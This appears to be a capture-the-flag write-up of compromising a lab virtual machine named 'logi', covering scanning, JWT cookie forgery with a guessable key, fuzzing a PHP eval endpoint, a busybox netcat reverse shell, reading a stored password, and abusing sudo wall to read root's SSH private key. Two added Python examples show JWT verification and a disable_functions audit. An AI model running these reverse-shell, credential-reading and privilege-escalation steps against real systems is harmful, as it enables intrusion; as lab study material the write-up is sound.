
Group member's target machine: logi

Once everything is set up, our Kali machine should be on the same network segment as the target machine, so just run ifconfig.

┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::20c:29ff:fe66:2ae1 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:66:2a:e1 txqueuelen 1000 (Ethernet)
RX packets 1 bytes 590 (590.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23 bytes 3062 (2.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 168 bytes 13440 (13.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 13440 (13.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Next, use arp-scan for information gathering.

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:f7:c4:82 PCS Systemtechnik GmbH
192.168.56.103 08:00:27:42:80:35 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 3 responded

From experience, we know that 192.168.56.103 is our target machine.

Use nmap to find the open ports.

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -p- 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 15:10 +08
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: TI15 AME\xE5\x8A\xA9\xE5\xA8\x81
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:42:80:35 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds

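Take a look in Firefox.

The page is about Dota; I have never played it, so I don't know much about it. The page source then gives a piece of information: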

<!--ame:jiayouachunyu-->

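Looks like a username and password? I tried an SSH connection with it and could not get in, so that is probably not what it is for.

Scan the directories with gobuster.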

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.56.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-*.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/user (Status: 200) [Size: 2170]
/admin (Status: 200) [Size: 1576]
/server-status (Status: 403) [Size: 279]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

The scan found user and admin.
The user page accepts the username and password from the hint above.
The admin page also contains a hint:

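<!-- Decoy form: it appears to ask for a username / password / second-factor code, but these fields are not used for the actual authentication -->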
<form method="post" autocomplete="off">
<label>用户名</label>
<input type="text" name="username" placeholder="请输入用户名" />

<label>密码</label>
<input type="password" name="password" placeholder="请输入密码" />

<label>二次校验码(可选)</label>
<input type="text" name="otp" placeholder="XXXXXX" />


<!-- Lets advanced users/tools submit a token directly (not shown prominently in the UI) -->
<label style="display:none">token(内部使用)</label>
<input type="text" name="token" style="display:none" />

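You can log in directly with a cookie. This is the classic CTF session forgery: the nevergiveup mentioned earlier is in fact the secret key here. Decode the JWT, change user to admin, re-encode it into a cookie with the secret key, and send the request with Burp Suite to log in.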
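
Why the server accepts the re-signed cookie, and what a proper key changes, as an added example (not code from the target or from this write-up). It assumes the cookie is a compact HS256 JWT with a `user` claim; the real cookie layout is not shown on the page, and the function names are hypothetical.

```python
import base64, hashlib, hmac, json, secrets

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64u_dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mac(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

def sign_hs256(claims: dict, key: bytes) -> str:
    """What the application does when it issues the cookie value."""
    head = b64u(b'{"alg":"HS256","typ":"JWT"}')
    body = b64u(json.dumps(claims, separators=(",", ":")).encode())
    return head + "." + body + "." + b64u(mac(head + "." + body, key))

def verify_hs256(token: str, key: bytes):
    """Return the claims if the MAC is valid under `key`, otherwise None."""
    try:
        head, body, sig = token.split(".")
        header, given = json.loads(b64u_dec(head)), b64u_dec(sig)
    except ValueError:                  # wrong shape, bad base64 or bad JSON
        return None
    # Pin the algorithm server-side instead of trusting the token header.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(mac(head + "." + body, key), given):
        return None
    return json.loads(b64u_dec(body))

def key_meets_rfc7518(key: bytes) -> bool:
    """RFC 7518 section 3.2: an HS256 key must be at least 256 bits."""
    return len(key) >= 32

WEAK_KEY = b"nevergiveup"               # the guessable secret from this write-up
STRONG_KEY = secrets.token_bytes(32)    # what the application should use

def compare_keys() -> dict:
    issued = sign_hs256({"user": "ame"}, WEAK_KEY)
    head, _, sig = issued.split(".")
    # Payload edited but signature left alone: rejected under any key.
    edited = head + "." + b64u(b'{"user":"admin"}') + "." + sig
    # Payload edited and re-signed by someone who knows the key.
    resigned = sign_hs256({"user": "admin"}, WEAK_KEY)
    return {
        "edited_only": verify_hs256(edited, WEAK_KEY),
        "resigned_weak_key": verify_hs256(resigned, WEAK_KEY),
        "resigned_vs_strong_key": verify_hs256(resigned, STRONG_KEY),
    }

if __name__ == "__main__":
    print(compare_keys(), key_meets_rfc7518(WEAK_KEY), key_meets_rfc7518(STRONG_KEY))
```

The MAC only proves that the signer knew the key, so a key that appears in a hint or a wordlist gives no integrity at all; a random 32-byte key kept out of the page source does.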

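The admin page gives another hint,
telling us to visit karsakarsa369.php.
Opening it in Firefox tells us to fuzz. From CTF experience this should mean fuzzing a GET parameter, so use ffuf to brute-force the GET parameter name.
The result is cmd.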

┌──(root㉿kali)-[~]
└─# ffuf -u 'http://192.168.56.103/karsakarsa369.php?FUZZ=phpinfo();' -w /home/kali/桌面/1.txt --fs 4

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.56.103/karsakarsa369.php?FUZZ=phpinfo();
:: Wordlist : FUZZ: /home/kali/桌面/1.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4
________________________________________________

cmd [Status: 200, Size: 86155, Words: 4281, Lines: 1024, Duration: 324ms]
:: Progress: [5846/5846] :: Job [1/1] :: 1680 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

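Next, fuzz the value of this parameter directly.
Use this wordlist:
Common CTF wordlist
Fuzz the key/value pair and see what is usable.
Note that fuzzing with this wordlist alone finds nothing; you need to modify it a little yourself.
The fuzz shows that phpinfo(); works.
As usual, check disable_functions first: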

system,passthru,shell_exec,proc_open,pcntl_exec,dl

These functions are disabled.
Use exec to get a reverse shell.
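
The gap that leaves exec available can be caught by auditing the directive, shown here as an added example (not part of the original write-up or the target's code). The php.ini fragment is constructed around the disable_functions value above, and the function names are hypothetical.

```python
import re

# PHP functions that start an OS process. The backtick operator is covered
# by shell_exec: PHP turns it off when shell_exec is disabled.
PROCESS_FUNCS = ("exec", "system", "passthru", "shell_exec",
                 "popen", "proc_open", "pcntl_exec")

def effective_disable_functions(ini_text: str) -> set[str]:
    """Return the disable_functions set from php.ini text.

    Assumption of this sketch: when the directive appears more than once,
    the last uncommented assignment is the one in effect.
    """
    value = ""
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()      # ';' starts a comment
        m = re.fullmatch(r"disable_functions\s*=\s*(.*)", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip('"')
    # PHP function names are case-insensitive, so normalise before comparing.
    return {name.strip().lower() for name in value.split(",") if name.strip()}

def still_callable(ini_text: str) -> list[str]:
    """Process-spawning functions the denylist forgot, in PROCESS_FUNCS order."""
    disabled = effective_disable_functions(ini_text)
    return [f for f in PROCESS_FUNCS if f not in disabled]

# Constructed php.ini fragment; the active value is the list shown above.
SAMPLE_INI = """\
; disable_functions = exec
[PHP]
disable_functions = system,passthru,shell_exec,proc_open,pcntl_exec,dl
"""

# Same file with a later directive that covers every entry in PROCESS_FUNCS.
HARDENED_INI = SAMPLE_INI + "disable_functions = " + ",".join(PROCESS_FUNCS) + ",dl\n"

if __name__ == "__main__":
    print("callable with the list above:", still_callable(SAMPLE_INI))
    print("callable after the fix:      ", still_callable(HARDENED_INI))
```

Even a complete denylist only narrows what evaluated code can do; the endpoint that evaluates the cmd parameter as PHP is the underlying flaw.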

Visit it in Firefox:

http://192.168.56.103/karsakarsa369.php?cmd=exec(%27busybox%20nc%20192.168.56.102%207777%20-e%20sh%27);

┌──(root㉿kali)-[~]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.103] 33902
ls
admin.php
ameti15-2.jpg
ameti15-3+.jpg
ameti15-4.png
ameti15.jpg
index.html
karsakarsa369.php
user.php
whoami
www-data

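Got a shell.

For some reason, though, a shell obtained this way cannot be stabilized.

So I went back to a bash reverse shell.

The stabilization steps do go through, but this shell behaves a bit strangely.
For how to upgrade to an interactive shell, see here:
Stabilizing a shell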

┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.103] 50456
bash: cannot set terminal process group (397): Inappropriate ioctl for device
bash: no job control in this shell
www-data@logi:/var/www/html$ ls
ls
admin.php
ameti15-2.jpg
ameti15-3+.jpg
ameti15-4.png
ameti15.jpg
index.html
karsakarsa369.php
user.php
www-data@logi:/var/www/html$ ^Z
zsh: suspended nc -lnvp 4444

┌──(root㉿kali)-[~]
└─# stty raw -echo; fg
[1] + continued nc -lnvp 4444
reset xterm
reset: terminal attributes: No such device or address

www-data@logi:/var/www/html$ export TERM=xterm
www-data@logi:/var/www/html$ export shell=/bin/bash
www-data@logi:/var/www/html$ ls
admin.php
ameti15-2.jpg
ameti15-3+.jpg
ameti15-4.png
ameti15.jpg
index.html
karsakarsa369.php
user.php
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$
www-data@logi:/var/www/html$ sudo -l
sudo -l
sudo: unable to resolve host logi: Temporary failure in name resolution

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

It needs a password.
I knew it most likely would not work, but I tried reading /etc/shadow anyway.

bash: cd: shadow: Not a directory
www-data@logi:/etc$ cat shadow
cat shadow
cat: shadow: Permission denied

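As expected, no luck.

At this point I was out of ideas on my own.

Later I read a group member's write-up and found that the password is written in a file.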

www-data@logi:/$ cat /var/backups/passwd
cat /var/backups/passwd
xiangwozheyangderen

That is promising, so we can try logging in as the user.

┌──(root㉿kali)-[~]
└─# ssh ame@192.168.56.103
ame@192.168.56.103's password:
Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 28 10:35:26 2025 from 172.20.10.11
ame@logi:~$ ls
user.txt
ame@logi:~$ whoami
ame

Logged in successfully; grab the user flag.

ame@logi:~$ cat user.txt
user:{niudexiongdiniude}

Next, run sudo -l to see how to escalate privileges.

ame@logi:~$ sudo -l
sudo: unable to resolve host logi: Temporary failure in name resolution
Matching Defaults entries for ame on logi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ame may run the following commands on logi:
(ALL) NOPASSWD: /usr/bin/wall

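The wall binary can be abused.

As usual, look up the technique in the privilege-escalation reference:
Privilege-escalation reference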

LFILE=file_to_read
sudo wall --nobanner "$LFILE"

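This can read arbitrary files.

According to an expert's write-up, the idea here is to read the SSH private key file and use it to log in as root over SSH.
So where is the private key file usually stored?
The article below explains which directory private key files are usually kept in on Linux: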
https://www.cnblogs.com/golinuxstudy/p/15059401.html

ame@logi:/$ sudo wall --nobanner "/root/.ssh/id_rsa.pub"
sudo: unable to resolve host logi: Temporary failure in name resolution


ame@logi:/$ sudo wall --nobanner "/root/.ssh/id_rsa"
sudo: unable to resolve host logi: Temporary failure in name resolution


Then I handed the private key to an AI to clean up the extra trailing spaces and so on.


Then save it and SSH in again as root.

Sure enough, the AI-cleaned version was broken, damn.

I cleaned it up directly with sed instead and got the flag.

root@logi:~# cat /root/provemyself.txt
root{xiangrootzheyangderen}